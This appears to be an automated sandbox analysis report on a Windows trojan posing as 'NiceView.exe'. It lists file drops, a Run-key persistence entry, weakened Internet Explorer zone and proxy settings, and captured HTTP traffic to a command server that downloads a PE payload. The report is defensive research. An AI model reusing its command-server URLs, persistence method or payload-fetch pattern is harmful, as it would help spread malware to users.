Trojan.GenericKD.3582851_6bf770b503

by malwarelabrobot on October 15th, 2016 in Malware Descriptions.

Trojan.MSIL.ShopBot.awp (Kaspersky), Trojan.GenericKD.3582851 (B) (Emsisoft), Trojan.GenericKD.3582851 (AdAware), Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6bf770b503a26a8b7cbcf608639262b2
SHA1: ff45b0ba65f265a385814cdcaf322b920a2e92d2
SHA256: 3d6134b42117f7e9b01b09edd34ed1001ca3085b5486579f0c4d9c78b369a392
SSDeep: 1536:BdVmbP8dJnB8YBA93bBPAafvjLLMkkkkkkqDZDZDZDZDZDZDOGA59QS:BdIYd0YBA931AafIkkkkkkqDZDZDZDZw
Size: 89602 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2016-10-06 16:40:03
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1524

The Trojan injects its code into the following process(es):

devencl.exe:508

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process devencl.exe:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[2].txt (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\respond-fork.min[1].js (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cl[1].css (2523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-ui-clcustom[1].css (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\sprite-16px[1].png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\json2.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jquery-ui-clcustom[1].css (1390 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage-concat.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ukraine.craigslist[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\localstorage[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\cl[1].css (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\html5shiv.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\general-concat.min[1].js (15737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\localstorage[1].html (508 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (0 bytes)

The process %original file name%.exe:1524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe (7800 bytes)

Registry activity

The process devencl.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"IDON" = "NA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"SoftwareID" = "636120405588452500.8683"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"PiciuUserAddWork" = "Corleone"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 50 00 12 C1 65 35 CD 50 E5 BB 3D 44 33 C5 38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"devencl.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F DD 2E 19 C5 54 28 35 18 07 8B 89 E6 F3 DB F6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Microsoft]
"devencl.exe" = "cleanrunning"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
b970215efd892348037db082c70ebc91 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\devencl.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: NiceView
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2016
Legal Trademarks:
Original Filename: NiceView.exe
Internal Name: NiceView.exe
File Version: 1.0.0.0
File Description: NiceView
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 17604 17920 3.97643 f94018c270bdc3e80223c4d90a1f8961
.sdata 32768 145 512 1.42965 e8ed94e2db5b8e93f55d0fbb4f2dc1d2
.rsrc 40960 69136 69632 2.75976 7fb777d1a8fff6374a52c53fbef4bca4
.reloc 114688 12 512 0.056519 c65ecb2a31f79a203ad7055218d9a79f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://aa.useracc.net/file/zzz.new 199.115.231.221
hxxp://aa.useracc.net/o/on.php?74362612 199.115.231.221
hxxp://www.l.craigslist.org/
hxxp://cities.l.craigslist.org/
hxxp://www.l.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b
hxxp://www.l.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771
hxxp://www.l.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440
hxxp://www.l.craigslist.org/js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a
hxxp://www.l.craigslist.org/js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469
hxxp://cities.l.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b
hxxp://www.l.craigslist.org/js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec
hxxp://cities.l.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771
hxxp://www.l.craigslist.org/js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c
hxxp://cities.l.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440
hxxp://www.l.craigslist.org/static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170
hxxp://www.l.craigslist.org/js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969
hxxp://aa.useracc.net/o/geo.php 199.115.231.221
hxxp://www.l.craigslist.org/images/sprite-16px.png
hxxp://www.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 208.82.237.1
hxxp://geo.craigslist.org/ 208.82.237.17
hxxp://www.craigslist.org/js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969 208.82.237.1
hxxp://ukraine.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b 208.82.237.2
hxxp://www.craigslist.org/js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a 208.82.237.1
hxxp://www.craigslist.org/static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170 208.82.237.1
hxxp://geo.cl.com/ 208.82.237.17
hxxp://www.craigslist.org/js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469 208.82.237.1
hxxp://ukraine.craigslist.org/ 208.82.237.2
hxxp://www.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 208.82.237.1
hxxp://www.craigslist.org/images/sprite-16px.png 208.82.237.1
hxxp://ukraine.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 208.82.237.2
hxxp://www.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b 208.82.237.1
hxxp://www.craigslist.org/js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c 208.82.237.1
hxxp://www.craigslist.org/js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec 208.82.237.1
hxxp://ukraine.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 208.82.237.2
digicare.rcs-rds.ro 81.196.14.173


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Traffic

POST /o/geo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/geo.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 43
Expect: 100-continue


HTTP/1.1 100 Continue
....




a1=aHR0cDovL3VrcmFpbmUuY3JhaWdzbGlzdC5vcmcv

HTTP/1.1 200 OK


Date: Fri, 14 Oct 2016 08:15:37 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 34
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226..DoneHTTP/1.1 200 OK..Date: Fri, 14 Oct 2
016 08:15:37 GMT..Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL
/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1..X-Powered-By: PHP/5.3.5
..Content-Length: 34..Content-Type: text/html..REMOTE_ADDR : 194.242.9
6.226..Done....


POST /o/geo.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/geo.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 43
Expect: 100-continue


HTTP/1.1 100 Continue
....




a1=aHR0cDovL3VrcmFpbmUuY3JhaWdzbGlzdC5vcmcv

HTTP/1.1 200 OK


Date: Fri, 14 Oct 2016 08:15:38 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 34
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226..Done..



GET /file/zzz.new HTTP/1.1
Host: aa.useracc.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 14 Oct 2016 08:15:25 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Thu, 06 Oct 2016 12:36:13 GMT
ETag: "9400000001a3ff-11e00-53e318a08802e"
Accept-Ranges: bytes
Content-Length: 73216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...=E.W
.............................)... ...@....@.. ........................
............@..................................(..K....`..X...........
.................@............................................... ....
........... ..H............text...4.... ...................... ..`.sda
ta.......@[email protected]....`....................
..@[email protected][email protected]........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.............................................)......H............u....
......P ..p...........................................................
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=n
eutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResour
ceSet............PADPADP....................lSystem.Resources.Resource
Reader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77
a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..
..*..(3.....*..0..C..........o=.... ..o>[email protected]
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo


HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Last-Modified: Fri, 14 Oct 2016 07:29:34 GMT
Set-Cookie: cl_def_hp=ukraine; path=/; domain=.craigslist.org; expires=Sat, 14-Oct-2017 07:29:34 GMT
Date: Fri, 14 Oct 2016 07:29:34 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 8349
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Fri, 14 Oct 2016 08:29:34 GMT
...........=...8r...M.0U...|T.....;==......>.q.AI..JI..Tfg.....{...
ea.b,...|0.~.>...~..ca..?8..RT&3KY..u.]IR..2..F.).........|....$.}r
.?...)oz).....R...b*... ,.1....O!.R.....!..*...tF..).!.p.H..cGR1c..2.'
I.2....w.......'O....4Ie}.y.f7..<UP..j......MO..j.m~.x.............
8R....O.'X..O...'N&..A-'..)...F}...]...{Rt5..dihv..q...... M.9.c..L...
. ....~B....!.?.......].}....._.O.u.............1. ..9#1...'....t2....
....o~8z9....G/......//.GPu.D4ct.q...s..........3. #q_B.......t.(..r.&
lt;){...MO.ELeD) M...M..q....nz..|>?.G...pP......|0.....b|q5.....{.
GGW..?.../O/.w...'4#!-.A........&....o.S......t|q...p.yN......{.T<)
.t::.^..K2.......!=....s'..p. ....Q.E[I....DxQ...$.$a........dLFW.....
..!.......N...{.....N..O^:W........f.8..d.f5.....x.....ON.?".....jrA'.
\\....;2#...s{=(..e...Tf<..0..5}...<w._]P:.....9!..$......U;..}F
S....}.7..s..9w.t.u.F....... :.CwB&g#wtF'W.....#.6(....E.4T....W7.....
....A.z......./.U.H.}...h.x.O.=I.......}..9:x:}zps...=...G.G_~9<.l.
. .mF..m@..:.p.>... R.G_... rn.%.*.2...|Y3:...6.<.o.N..b.....8..
;....y..k.@..<.....S\yn..@/...........5X.M.mB.6|.......!..&9. O.B..
.$H.........b.......s h..D.8_~Y.&.e1=p....U.......(.rh,...2@iz.......\
..`.(....Q5..yb.W'..}P'.9...O...T.f.d... D [email protected].._.~. ....%
.._a...G......>...4..G..Fp....1.....(..:........h8.@... (.(...H....
D...S..`,.k}.n..t.S.R?..'/x.z..yXH.....`....Q.'R:w.G..o.C.....3P......
Te.G.....>...T..-#y.~....F.._z.W..a.V..9Zu.m..&.;.......... .z.P.O.
}6.4.\..LO..X.....|X.A..LC.... ..n.........UP.SQ..J..sEa...,..]..x
<<< skipped >>>

GET /styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 06 Oct 2016 20:47:47 GMT
Date: Thu, 06 Oct 2016 20:47:47 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9466
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 05 Nov 2016 20:47:47 GMT
...........=k..6r.. ..r...x.^..*...v.....;./S..I.R"MR3;...../6^.ww.).H
..h....F#)6....m]....P.uT...HGmG6.V*E~\......u.._....Vk.c.T.c>*.dG.
........c[7EGG.......[.....ny...jsj..Y.Uq.h...b....w.D....rD.bw\..<
/.....=..$P.QKI...Q!u..]Q..i4..S..U.]IG;.!.>.s...>.v.,i.....k..h
. .4.p.R.......O.u.p.......mx .........k._...............(M..cu.....b}
....=).........<.a.........a..].....I....4...^Fkr,.=.#[email protected]
...F>.[<g..Dc.......i.,l.#...4/H.....?....Z6.O.....3-G.a....m.}.
..m....D......y..!.a2..... .s....e....8/...&...uI..Z.J7]\l.r..>...x
?...x?.....9...Tu4.......ML6Mu|9.$...m..v....o...9-.|{..!....8...u....
qK.u...;...)>Q.....=...u.u...J.......'.s....<...T.e.o.Z.-...j.qI
......1.;........;^.n[U]..)a..{..<&...(i..2..H.H.HQ...5.Y1...4.Q...
..0...u.......S\......i....a!G{:...h(X...O19.E.?.R...v.tU..,.;......=l
.c'.1M...l..S..6C_....r9.g`..;..T.^.....ok',..5$E..$[..o*.7....d.:e.w.
.R...o.. }.....-]..Y...z.^...Kg^.-9....P. H...[T.....r.'d..i.kv....u..
.0=....E..Ur._.Qu,_.71D8..-.T.._.%g|e.M.s.7....G.}[..._..3.g.U....m...
.=9.D.....!.d.%Z<Rc0.\......X[s..M.G.V"....W%.V....sc....!.P]u....Z
.>....P...2.....P...Q<r.....r...|...|._.=...k.&..........~..j...
..X...q..J:.0.h.&.L.........k.~t>.e...bFW%.v..c^)[.W Z.SW)..}R"*{..
|[V.KV....5......2...q.$Z.-...=[..o*.$|7..W...y...|.V.c.ho..e}.:..."l.
...^].7................P..%sn.:x...:N....6.X^...._.J.p....&....wH>.
.k......$.Q...j.r..{....7...,..D....p}f....|8..-..(..vM...F,a..= ....o
.C]5.9vl.K.._.IU...8...d.. .E...{...M..E.w....6..#&Gp0..g...F..LY2
<<< skipped >>>

GET /styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 09 Oct 2016 17:56:02 GMT
Date: Sun, 09 Oct 2016 17:56:02 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4135
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 08 Nov 2016 17:56:02 GMT
...........;...8....lUT.9.2.q..8.c:f_.a/[email protected]. ..kc:...(
3.J.]j?OD..ySq..m...&/y^.M....0...1.....z..]."..b.8.. .M^.......E>6
.4U..l.}.>..<}7.kV1.F..O....QG................6O(.P.........{...
.8...M.h.d.1I%...E...f..0B..t.ls..5.0..o9{..(...\.}.GP.7.*.C0...Z.{~..
.. .U....v})/(.....W^E..2.......~....o..a...Q[JQ2c.(..7d..g..Ww`.Z..G.
...>O.U.f}[_B..&D.G...Y.*.@.[|nbZ.M.R.Ake..a.......C...g...\..%,.~I
..9...d.....X.S......y.)@.){.......75..............D<.7........{...
....3e...-8.E.I...4.-..*.Z"..,iI~.i.H.%YH....H.'.#..t^?;.2R..PB..&4.E.
Y....zC..D.`.$"e$e..........eC^...$.ihQ...w@..._....D.... ....L)&..I..
.....$M........3.6......i.3rvbeJZ.s..V(M..e.G!Z.f..x...M.E.....SD(.h..
.4.......9u.h...!!..)....". ;R.7"...ZRw.'[email protected].....
..2/O....h..Q.... ....<2.{>w.1m.F.s.{t...>9S.k...^.6..(f Hflv
D......O....laS.?..0<JZR..b}...i..hx.k...%r.g..^..H...F.(.....-.~.[
.7..Nh..f,WvnY.o-.....G. ]....[.h6.....R....e..F....._9.h$..6".....~.9
....*....:....-......'5..:"...a.%.|.H..Z.T]....YK....o...ac......p....
.1^..<......B.Q......e.IR.../......z......a..T~8.....~.._.T.o..1...
...}...d$.........a.k........(..w.e._.....1..X.3v...F.p^.......k..v..!
E.G..G..#Xv..)f.....q.....oJ.F...3.C..8d..a..L/s.[.S~.Q.l..:?...m.K..@
.B...]. . ....>.B.........k.\C.<...._=-pX}......)$p..0.B./..Q...
]e|..'V.dM...x.G........c.$Ff..5.L...W=8n.i.:...e....\.....R.^x..SJ...
.J.--[.`>.x.}.{..7R.0...JP#.m...E`0.Y./.X...%..y......$.h.-..../..`
..L...gu-..3.=..W.o..{LN....7....6MS..)O.-....8..<.......C>5
<<< skipped >>>

GET /styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sat, 24 Sep 2016 09:57:43 GMT
Date: Sat, 24 Sep 2016 09:57:43 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 7544
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Mon, 24 Oct 2016 09:57:43 GMT
...........=iS..........u{..8q...W.....d....rb.-^.....dIv.H.L..zP=....
.]G[8...........[....Y.tV...bI.JE.\......;......2......]K1..x...v...y.
....syf.G.x......P....&.d..Qu."..o......`..~.V.}......Y..{.?....'.....
o&.I..........- z.|y..m......0.7P.7..... [j..U].....aN.;O.i.;G..m..=..
M.......!pU...#^_.P...O.<....}.6..e..l|.......... .}Y...g..~...m.v;
@...T..l|.[?p.i^.......<[....9.9...;.Q....Y...&....B.E..]Wl .F..'..
........ q.!.9.^.Y.Zc...,..v.E.5P...\D.sC......4.Q.Z..!.Q..~.lD.u....^
[email protected].=...7a..Z..... ... g........z'....s....f..9.Om.5
.H..... ~'[email protected]].M.j...G.F..2..........V.. ..yVp{#..nS..\...z..O..
.{.B...T.w...."zQ.n.......BV.M.$i.Q$.1A......,-.AIS.&.[.<....i....@
.....t..s..............t..Q>.a.t..b......z...].....c.....Y...`8....
..k.....pa....{-.......f..vQ.T...p....b....\.......4ew.[.B.9.$..7....#
..n.!.....2~.....|p..U..RHr..!....b.?f..|C.....O..9 _..~...:..........
WpQ*...q<.....S.b.......hp.>...5..{....o..#m...0)(p....\D....Z..
......7u ......_...rEj.?...j.z.U..}.;M7 ....,...........B.?..R.6..Z=.V
...:.W. ......'[email protected]....}h*....b../.8
....P%@MKO.....a....tw............Z.r\..zw.L.0...G..f88f.,......3.a.4.
N..a.......,q..".[..D..A)....!H..."C...x|*02|.....!....!..<1.v.....
l"2.<.....x17^.....#D1.-.<.1...j1S^....X#.`B]Y.......,....i.....
cR.......F. %... .2.^.*T.....S..E&U.$..)X!......L.#.rl....e.]D.'t.<
..c....B.?5`^&.....e-L...P....3......!..j#.$.vD.C...H0.`=......X...:..
